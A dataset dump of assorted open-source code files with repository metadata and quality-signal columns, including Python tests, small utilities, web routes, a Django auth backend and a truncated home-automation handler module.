hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
da2b0d4562489488864ba4de9fb762d95ecb2356
970
py
Python
tests/functional/test_get_vehicles.py
vyahello/fake-cars-api
13c7325a7d8779d4b2e5ce60d5664b843c891cb6
[ "MIT" ]
null
null
null
tests/functional/test_get_vehicles.py
vyahello/fake-cars-api
13c7325a7d8779d4b2e5ce60d5664b843c891cb6
[ "MIT" ]
3
2019-11-22T20:56:17.000Z
2021-09-15T08:18:30.000Z
tests/functional/test_get_vehicles.py
vyahello/fake-vehicles-api
13c7325a7d8779d4b2e5ce60d5664b843c891cb6
[ "MIT" ]
null
null
null
import requests import pytest from apistar import TestClient from api.web.support import Status from tests.markers import smoke @pytest.fixture(scope="module") def response(client: TestClient) -> requests.Response: return client.get("/api") @smoke def test_get_vehicles_status(response: requests.Response) -> None: assert response.status_code == Status.SUCCESS.code @smoke def test_vehicles_count(response: requests.Response) -> None: assert len(response.json()) == 1000 @smoke def test_vehicles_is_list(response: requests.Response) -> None: assert type(response.json()) is list @smoke def test_get_first_vehicle(response: requests.Response) -> None: assert response.json()[0] == { "id_": 1, "manufacturer": "Mazda", "model": "RX-8", "year": 2006, "vin": "JTJBARBZ2F2356837", } @smoke def test_last_vehicle_id(response: requests.Response) -> None: assert response.json()[-1]["id_"] == 1000
23.095238
66
0.697938
121
970
5.454545
0.404959
0.145455
0.090909
0.212121
0.306061
0.20303
0.139394
0
0
0
0
0.029814
0.170103
970
41
67
23.658537
0.790062
0
0
0.172414
0
0
0.068041
0
0
0
0
0
0.172414
1
0.206897
false
0
0.172414
0.034483
0.413793
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
2
da357111c28536ab8eed4063bcc9a095711453cc
747
py
Python
rosalindLibrary/programs/fib.py
aevear/RosalindProject
494dcf3ccfcc8047cc472dd7ca012bca45c0ebe2
[ "MIT" ]
1
2021-01-20T02:00:21.000Z
2021-01-20T02:00:21.000Z
rosalindLibrary/programs/fib.py
aevear/RosalindProject
494dcf3ccfcc8047cc472dd7ca012bca45c0ebe2
[ "MIT" ]
null
null
null
rosalindLibrary/programs/fib.py
aevear/RosalindProject
494dcf3ccfcc8047cc472dd7ca012bca45c0ebe2
[ "MIT" ]
null
null
null
#------------------------------------------------------------------------------- # mrna #------------------------------------------------------------------------------- def runFib(inputFile): fi = open(inputFile, 'r') #reads in the file that list the before/after file names inputData = fi.readline().split() #reads in files n, m = int(inputData[0]), int(inputData[1]) mature, immature = 0, 1 for i in range(n-1): babies = mature * m mature = immature + mature immature = babies total = mature + immature return total #------------------------------------------------------------------------------- # Fin #-------------------------------------------------------------------------------
32.478261
86
0.342704
58
747
4.413793
0.586207
0.21875
0
0
0
0
0
0
0
0
0
0.008039
0.167336
747
22
87
33.954545
0.403537
0.527443
0
0
0
0
0.002899
0
0
0
0
0
0
1
0.090909
false
0
0
0
0.181818
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
da3c8d5401dfee9fd9d89f39c39af9a102ae502a
2,446
py
Python
tester-webserv/PythonTester/src/testcase_generation/Response/media_type.py
aprilmayjune135/42_web_server
46bc46dd6a0008119842e3848d4fe57fcd84526b
[ "MIT" ]
2
2022-01-04T13:07:46.000Z
2022-01-04T13:08:50.000Z
tester-webserv/PythonTester/src/testcase_generation/Response/media_type.py
aprilmayjune135/web-server
46bc46dd6a0008119842e3848d4fe57fcd84526b
[ "MIT" ]
3
2021-09-27T08:35:34.000Z
2021-11-25T09:49:52.000Z
tester-webserv/PythonTester/src/testcase_generation/Response/media_type.py
aprilmayjune135/web-server
46bc46dd6a0008119842e3848d4fe57fcd84526b
[ "MIT" ]
2
2021-11-17T20:26:55.000Z
2021-12-22T21:54:24.000Z
import TestCase from testcase_generation.Response.default import defaultTestCase import Constants def defaultMediaTypeTestCase(): testcase = defaultTestCase() # Request testcase.request.method = 'GET' # Response testcase.response.status_code = 200 testcase.response.expect_body = True return testcase def testCaseMediaType_html(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_html' testcase.request.target = '/MediaType/sample.html' testcase.response.headers['Content-Type'] = 'text/html' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.html', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase def testCaseMediaType_txt(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_txt' testcase.request.target = '/MediaType/sample.txt' testcase.response.headers['Content-Type'] = 'text/plain;charset=UTF-8' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.txt', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase def testCaseMediaType_png(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_png' testcase.request.target = '/MediaType/sample.png' testcase.response.headers['Content-Type'] = 'image/png' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.png', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase def testCaseMediaType_jpeg(): testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_png' testcase.request.target = '/MediaType/sample.jpeg' testcase.response.headers['Content-Type'] = 'image/jpeg' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.jpeg', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase def testCaseMediaType_sh(): 
testcase = defaultMediaTypeTestCase() testcase.name = 'MediaType_sh' testcase.request.target = '/MediaType/sample.sh' testcase.response.headers['Content-Type'] = 'application/x-sh' with open(Constants.SERVER_ROOT + '/Method/MediaType/sample.sh', 'rb') as f: testcase.response.body = f.read() testcase.response.headers['content-length'] = str(len(testcase.response.body)) return testcase
38.825397
79
0.766149
292
2,446
6.356164
0.178082
0.189655
0.123922
0.161638
0.802263
0.640086
0.557112
0.557112
0.427802
0.427802
0
0.001807
0.094849
2,446
62
80
39.451613
0.836495
0.006541
0
0.425926
0
0
0.215492
0.10342
0
0
0
0
0
1
0.111111
false
0
0.055556
0
0.277778
0
0
0
0
null
0
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
da3f1f4cde5731fedeac0f7e5d94ec5f66cd184a
158
py
Python
hackerrank/Python/Min and Max/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
4
2020-07-24T01:59:50.000Z
2021-07-24T15:14:08.000Z
hackerrank/Python/Min and Max/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
null
null
null
hackerrank/Python/Min and Max/solution.py
ATrain951/01.python-com_Qproject
c164dd093954d006538020bdf2e59e716b24d67c
[ "MIT" ]
null
null
null
import numpy n, m = map(int, input().split()) a = numpy.array([input().split() for _ in range(n)], dtype=int) print(numpy.max(numpy.min(a, axis=1), axis=0))
26.333333
63
0.64557
29
158
3.482759
0.689655
0.19802
0
0
0
0
0
0
0
0
0
0.014388
0.120253
158
5
64
31.6
0.71223
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0.25
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
da466d1a320ccba5632829b19d644b45e51663c0
314
py
Python
util/data_type_util.py
Chandru01061997/pythonDB
fc164bdc921fd42af316f034433fbc27bacfd24c
[ "Apache-2.0" ]
409
2020-07-01T14:10:50.000Z
2022-02-25T03:10:26.000Z
util/data_type_util.py
Chandru01061997/pythonDB
fc164bdc921fd42af316f034433fbc27bacfd24c
[ "Apache-2.0" ]
14
2020-07-03T23:09:49.000Z
2020-10-07T12:37:12.000Z
util/data_type_util.py
Chandru01061997/pythonDB
fc164bdc921fd42af316f034433fbc27bacfd24c
[ "Apache-2.0" ]
303
2020-07-01T14:08:53.000Z
2022-03-08T17:59:34.000Z
from uuid import UUID from datetime import datetime def uuid_from_string(string): return UUID('{s}'.format(s=string)) def format_timestamp(string): if isinstance(string, str): return datetime.strptime(string, '%Y-%m-%dT%H:%M:%S.%fZ') if isinstance(string, datetime): return string
20.933333
65
0.681529
44
314
4.795455
0.431818
0.075829
0.170616
0
0
0
0
0
0
0
0
0
0.184713
314
14
66
22.428571
0.824219
0
0
0
0
0
0.076433
0.066879
0
0
0
0
0
1
0.222222
false
0
0.222222
0.111111
0.777778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
0
0
0
2
da4ed74782f85b5d5a5f393709c19e30745e1f4b
1,259
py
Python
theoneapi_sdk/movie/movie.py
eliram/LotR-Eliram-SDK
b3ae064367d30d4d2ef6ec503125e3aa5106b0d7
[ "Apache-2.0" ]
null
null
null
theoneapi_sdk/movie/movie.py
eliram/LotR-Eliram-SDK
b3ae064367d30d4d2ef6ec503125e3aa5106b0d7
[ "Apache-2.0" ]
null
null
null
theoneapi_sdk/movie/movie.py
eliram/LotR-Eliram-SDK
b3ae064367d30d4d2ef6ec503125e3aa5106b0d7
[ "Apache-2.0" ]
null
null
null
"""Handle the movie endpoint.""" from typing import TYPE_CHECKING, List from theoneapi_sdk.movie.movie_dataclass import MovieData, MovieList from theoneapi_sdk.quote.quote_dataclass import QuotesList if TYPE_CHECKING: from theoneapi_sdk.request_handler import RequestHandler from theoneapi_sdk.filter import Filter class Movie: """Handle the movie endpoint.""" def __init__(self, request_handler: "RequestHandler"): self._request_handler = request_handler def list(self, page: int = 1, limit: int = 100, filters: List["Filter"] = [], **kwargs) -> "MovieList": """Get a list of quotes. """ return MovieList(self._request_handler._get(f"movie?page={page}&limit={limit}", filters=filters, **kwargs)) def movie(self, movie_id: int) -> MovieData: """Get a movie by id. """ return MovieData(self._request_handler._get(f"movie/{movie_id}")["docs"][0]) def movie_quotes(self, movie_id: int, page: int = 1, limit: int = 100, filters: List["Filter"] = [], **kwargs) -> "QuotesList": """Get a list of quotes for a movie. """ return QuotesList(self._request_handler._get(f"movie/{movie_id}/quote?page={page}&limit={limit}", filters=filters, **kwargs))
40.612903
133
0.675139
162
1,259
5.055556
0.271605
0.119658
0.10989
0.076923
0.350427
0.311355
0.278388
0.185592
0.102564
0.102564
0
0.008772
0.185068
1,259
30
134
41.966667
0.789474
0.123114
0
0
0
0
0.133581
0.073284
0
0
0
0
0
1
0.266667
false
0
0.333333
0
0.866667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
0
0
0
2
da5b39150b74efcfc4f695de69dc90531942a1d9
360
py
Python
app/__init__.py
simplg/Object-Detection-Flask-TF-VanillaJS
0ab9b341b998fd49f277af742aa62b60fdf86735
[ "MIT" ]
null
null
null
app/__init__.py
simplg/Object-Detection-Flask-TF-VanillaJS
0ab9b341b998fd49f277af742aa62b60fdf86735
[ "MIT" ]
null
null
null
app/__init__.py
simplg/Object-Detection-Flask-TF-VanillaJS
0ab9b341b998fd49f277af742aa62b60fdf86735
[ "MIT" ]
null
null
null
from flask import Flask from app.services import model_manager from app.controllers.api_blueprint import api_router from app.controllers.main_blueprint import main_router def create_app(test_config=None): app = Flask(__name__) model_manager.init_app(app) app.register_blueprint(api_router) app.register_blueprint(main_router) return app
25.714286
54
0.805556
52
360
5.25
0.403846
0.076923
0.131868
0
0
0
0
0
0
0
0
0
0.136111
360
14
55
25.714286
0.877814
0
0
0
0
0
0
0
0
0
0
0
0
1
0.1
false
0
0.4
0
0.6
0.4
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
da70807eb2e1dbd92d65c49dd5a4de5681a83229
1,161
py
Python
routes/web.py
erikwestlund/zuhanden
635004bc310235d10379c2811e42f121da14845f
[ "MIT" ]
3
2019-10-30T18:31:23.000Z
2020-03-11T05:00:44.000Z
routes/web.py
erikwestlund/zuhanden
635004bc310235d10379c2811e42f121da14845f
[ "MIT" ]
6
2021-03-09T21:14:05.000Z
2022-02-26T19:24:45.000Z
routes/web.py
erikwestlund/zuhanden
635004bc310235d10379c2811e42f121da14845f
[ "MIT" ]
null
null
null
"""Web Routes.""" from masonite.routes import Get, Post ROUTES = [Get("/", "IndexController@show").name("index")] ROUTES = ROUTES + [ Get().route("/users/sign-in", "SignInController@show").name("sign_in"), Post().route("/users/sign-in", "SignInController@sign_in"), Get().route("/users/sign-out", "SignInController@sign_out").name("sign_out"), Get().route("/users/sign-up", "SignUpController@show").name("sign_up"), Post().route("/users/sign-up", "SignUpController@store"), Get() .route("/users/verify-email", "VerifyEmailController@verify_show") .name("verify"), Get().route("/users/verify-email/send", "VerifyEmailController@send_verify_email"), Get().route( "/users/verify-email/@id:signed", "VerifyEmailController@confirm_email" ), Get() .route("/users/reset-password", "PasswordController@reset_form") .name("forgot.password"), Post().route("/users/reset-password", "PasswordController@send"), Get() .route("/users/reset-password/@token", "PasswordController@reset") .name("password.reset"), Post().route("/users/reset-password/@token", "PasswordController@update"), ]
40.034483
87
0.667528
129
1,161
5.930233
0.263566
0.156863
0.135948
0.120261
0.50719
0.120261
0
0
0
0
0
0
0.11714
1,161
28
88
41.464286
0.746341
0.009475
0
0.125
0
0
0.564685
0.413462
0
0
0
0
0
1
0
false
0.25
0.041667
0
0.041667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
e511c6ab80ef1771a595dc11f1c4f7c408d02fd1
847
py
Python
code/api/Monitor/newUser_backend.py
RandyCamacho/SeniorDesign-HomeCU
f862c453b0454838d662688fba88e95412d0229e
[ "MIT" ]
null
null
null
code/api/Monitor/newUser_backend.py
RandyCamacho/SeniorDesign-HomeCU
f862c453b0454838d662688fba88e95412d0229e
[ "MIT" ]
null
null
null
code/api/Monitor/newUser_backend.py
RandyCamacho/SeniorDesign-HomeCU
f862c453b0454838d662688fba88e95412d0229e
[ "MIT" ]
null
null
null
from django.contrib.auth.backends import BaseBackend from django.contrib.auth.hashers import check_password from .models import BsuOfficeusers class newUserBackend(BaseBackend): def checkusername(self, username=None): try: user = BsuOfficeusers.objects.get(user_name=username) return 1 except BsuOfficeusers.DoesNotExist: return None def checkemail(self, email=None): try: user = BsuOfficeusers.objects.get(email=email) except BsuOfficeusers.DoesNotExist: return None def addCustomer(self, email=None, username=None, password=None): try: BsuOfficeusers.objects.create_user(username=username, password=password) except: return None def addStaff(self, email=None, username=None, password=None): try: BsuOfficeusers.objects.create_superuser(username=username, passwd=password) except: return None
26.46875
78
0.779221
101
847
6.49505
0.346535
0.042683
0.059451
0.064024
0.448171
0.448171
0.204268
0.204268
0.204268
0.204268
0
0.001362
0.133412
847
31
79
27.322581
0.892371
0
0
0.48
0
0
0
0
0
0
0
0
0
1
0.16
false
0.2
0.12
0
0.52
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
1
0
0
2
e516dc00b8ae9fe3e8b9e99903e96f46b24dbaf6
189
py
Python
par ou impar.py
Azultropico/exercicios_python
02dc118d0330673a0d961b8ff48eb0acd1e81aea
[ "Apache-2.0" ]
null
null
null
par ou impar.py
Azultropico/exercicios_python
02dc118d0330673a0d961b8ff48eb0acd1e81aea
[ "Apache-2.0" ]
null
null
null
par ou impar.py
Azultropico/exercicios_python
02dc118d0330673a0d961b8ff48eb0acd1e81aea
[ "Apache-2.0" ]
null
null
null
n1 = int(input("Digite um número: ")) if __name__ == '__main__': if n1 % 2 == 0: print("Número Par") elif n1 % 2 == 1: print("Número Ímpar") else: print("Valor Inválido")
21
37
0.571429
27
189
3.703704
0.703704
0.06
0
0
0
0
0
0
0
0
0
0.049296
0.248677
189
9
38
21
0.65493
0
0
0
0
0
0.326316
0
0
0
0
0
0
1
0
false
0
0
0
0
0.375
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e523fccfcc84e837a16106964d13dc172e1fbf92
205
py
Python
maps/bboxes.py
CharlesRethman/HEA-Baselines-ZA-2015-Oct
e8689576a8ec682af3f7714d7bfb3609eadbff19
[ "MIT" ]
null
null
null
maps/bboxes.py
CharlesRethman/HEA-Baselines-ZA-2015-Oct
e8689576a8ec682af3f7714d7bfb3609eadbff19
[ "MIT" ]
null
null
null
maps/bboxes.py
CharlesRethman/HEA-Baselines-ZA-2015-Oct
e8689576a8ec682af3f7714d7bfb3609eadbff19
[ "MIT" ]
null
null
null
l = iface.activeLayer() iter = l.getFeatures() geoms = [] for feature in iter: geom = feature.geometry() if not(geom.isMultipart()): l.boundingBox(feature.id()) geoms.append(geom)
22.777778
35
0.629268
25
205
5.16
0.68
0
0
0
0
0
0
0
0
0
0
0
0.219512
205
9
36
22.777778
0.80625
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e52a791dd7cf06539d84f8c0ef6bb28561fd022f
2,417
py
Python
lib/sysusage.py
Tormir/Beats
b1556c762725a50ac7a5acc9b993bc344bd669b3
[ "Apache-2.0" ]
null
null
null
lib/sysusage.py
Tormir/Beats
b1556c762725a50ac7a5acc9b993bc344bd669b3
[ "Apache-2.0" ]
null
null
null
lib/sysusage.py
Tormir/Beats
b1556c762725a50ac7a5acc9b993bc344bd669b3
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python3.6 import os, subprocess, json, argparse def Parser(): parser = argparse.ArgumentParser(description='Process metrix from system') parser.add_argument('-C', metavar='Command', type=str, help='Command which process started, delimiter is ":::", e.g. command:command', required=True) return parser.parse_args() def Windows() : return None def Linux() : parser = Parser() command = parser.C.split(":::") data = {} CommandData = {} proces = subprocess.run(['ps', 'aux'], stdout=subprocess.PIPE).stdout.decode("utf-8").splitlines() for x in range(len(json.loads(json.dumps(proces)))): data[' '.join(json.loads(json.dumps(proces))[x].split()[10:])] = '{"USER":"' + json.loads(json.dumps(proces))[x].split()[0] + '"' + \ ', "PID":' + json.loads(json.dumps(proces))[x].split()[1] + \ ', "CPU":' + json.loads(json.dumps(proces))[x].split()[2] + \ ', "MEM":' + json.loads(json.dumps(proces))[x].split()[3] + \ ', "VSZ":' + json.loads(json.dumps(proces))[x].split()[4] + \ ', "RSS":' + json.loads(json.dumps(proces))[x].split()[5] + \ ', "TTY":"' + json.loads(json.dumps(proces))[x].split()[6] + '"' + \ ', "STAT":"' + json.loads(json.dumps(proces))[x].split()[7] + '"' + \ ', "START":"' + json.loads(json.dumps(proces))[x].split()[8] + '"' + \ ', "TIME":"' + json.loads(json.dumps(proces))[x].split()[9] + '"' + \ ', "COMMAND":"' + ' '.join(json.loads(json.dumps(proces))[x].split()[10:]) + '"' + \ '}' with open('lib/metrics.json', 'w') as f: for i in command: f.write(data.get(i) + '\n') if __name__ == '__main__': Linux()
60.425
157
0.386016
213
2,417
4.333333
0.43662
0.126761
0.183099
0.253521
0.429036
0.403034
0.403034
0.078007
0.078007
0
0
0.012373
0.431527
2,417
39
158
61.974359
0.659389
0.007861
0
0
0
0
0.107217
0
0
0
0
0
0
1
0.096774
false
0
0.032258
0.032258
0.193548
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e53ffa8559a6302d0825134979cfdab0f28e4630
477
py
Python
backend/examples/admin.py
daobook/doccano
45122687740f74f19e2578c5cf28507f0839bf16
[ "MIT" ]
2
2021-12-11T22:25:27.000Z
2021-12-20T01:02:16.000Z
backend/examples/admin.py
daobook/doccano
45122687740f74f19e2578c5cf28507f0839bf16
[ "MIT" ]
1
2022-02-15T10:50:18.000Z
2022-02-15T10:50:18.000Z
backend/examples/admin.py
daobook/doccano
45122687740f74f19e2578c5cf28507f0839bf16
[ "MIT" ]
null
null
null
from django.contrib import admin from .models import Example, Comment class ExampleAdmin(admin.ModelAdmin): list_display = ('text', 'project', 'meta') ordering = ('project',) search_fields = ('text',) class CommentAdmin(admin.ModelAdmin): list_display = ('user', 'example', 'text', 'created_at', ) ordering = ('user', 'created_at', ) search_fields = ('user',) admin.site.register(Example, ExampleAdmin) admin.site.register(Comment, CommentAdmin)
23.85
62
0.689727
52
477
6.211538
0.480769
0.105263
0.117647
0.160991
0
0
0
0
0
0
0
0
0.155136
477
19
63
25.105263
0.801489
0
0
0
0
0
0.144654
0
0
0
0
0
0
1
0
false
0
0.166667
0
0.833333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
e54c28e31b4b4c56e93933ccf0dd21e1a1a1a372
815
py
Python
tartiflette/language/ast/base.py
remorses/tartiflette-whl
92bed13de130a7a88278d7019314135e01281259
[ "MIT" ]
530
2019-06-04T11:45:36.000Z
2022-03-31T09:29:56.000Z
tartiflette/language/ast/base.py
remorses/tartiflette-whl
92bed13de130a7a88278d7019314135e01281259
[ "MIT" ]
242
2019-06-04T11:53:08.000Z
2022-03-28T07:06:27.000Z
tartiflette/language/ast/base.py
remorses/tartiflette-whl
92bed13de130a7a88278d7019314135e01281259
[ "MIT" ]
36
2019-06-21T06:40:27.000Z
2021-11-04T13:11:16.000Z
__all__ = ( "Node", "DefinitionNode", "ExecutableDefinitionNode", "TypeSystemDefinitionNode", "TypeSystemExtensionNode", "TypeDefinitionNode", "TypeExtensionNode", "SelectionNode", "ValueNode", "TypeNode", ) class Node: __slots__ = () class DefinitionNode(Node): __slots__ = () class ExecutableDefinitionNode(DefinitionNode): __slots__ = () class TypeSystemDefinitionNode(DefinitionNode): __slots__ = () class TypeSystemExtensionNode(DefinitionNode): __slots__ = () class TypeDefinitionNode(TypeSystemDefinitionNode): __slots__ = () class TypeExtensionNode(TypeSystemExtensionNode): __slots__ = () class SelectionNode(Node): __slots__ = () class ValueNode(Node): __slots__ = () class TypeNode(Node): __slots__ = ()
15.377358
51
0.687117
50
815
10.32
0.26
0.174419
0.108527
0
0
0
0
0
0
0
0
0
0.201227
815
52
52
15.673077
0.792627
0
0
0.3125
0
0
0.188957
0.087117
0
0
0
0
0
1
0
false
0
0
0
0.625
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
2
e55b00333f1d03a1830681b90bdf11aebe0e4245
6,286
py
Python
energenie/Handlers/__init__.py
klattimer/pyenergenie
1677bd2ac2bda9d0cd6960b5fb537a2d097eda4e
[ "MIT" ]
null
null
null
energenie/Handlers/__init__.py
klattimer/pyenergenie
1677bd2ac2bda9d0cd6960b5fb537a2d097eda4e
[ "MIT" ]
15
2020-03-22T13:55:00.000Z
2021-12-14T09:07:56.000Z
energenie/Handlers/__init__.py
klattimer/pyenergenie
1677bd2ac2bda9d0cd6960b5fb537a2d097eda4e
[ "MIT" ]
null
null
null
import os import importlib, inspect import logging from ..Config import Config class Handler: _protocol = None _description = None _args = {} @classmethod def describe(cls): return { 'protocol': cls.protocol, 'description': cls.description, 'args': cls.args } def __init__(self, **kw_args): self.name = kw_args.get('name') self.enabled = kw_args.get('enabled') self.config = Config.singleton() def serialise(self): return { 'type': self.__class__.__name__, 'name': self.name, 'enabled': self.enabled } def ask(self): pass def destroy(self): pass def device_detected(self, device): pass def device_added(self, device): pass def device_removed(self, device): pass def set(self, device, key, value): # Lookup the device, and set the key to value pass def handle_reading(self, device, key, value): pass def handle_unknown(self, address, message): pass def alarm(self, device, key, value, alarm_reason): pass class HandlerFactory: __single = None @classmethod def singleton(cls): if cls.__single is None: cls.__single = cls() return cls.__single @classmethod def keys(cls): return list(cls.singleton().handlers.keys()) def __init__(self): self.handlers = {} p = os.path.dirname(os.path.abspath(__file__)) files = os.listdir(p) for f in files: if f.startswith("__"): continue if not f.endswith(".py"): continue m = f.replace('.py', '') try: module = importlib.import_module('.' 
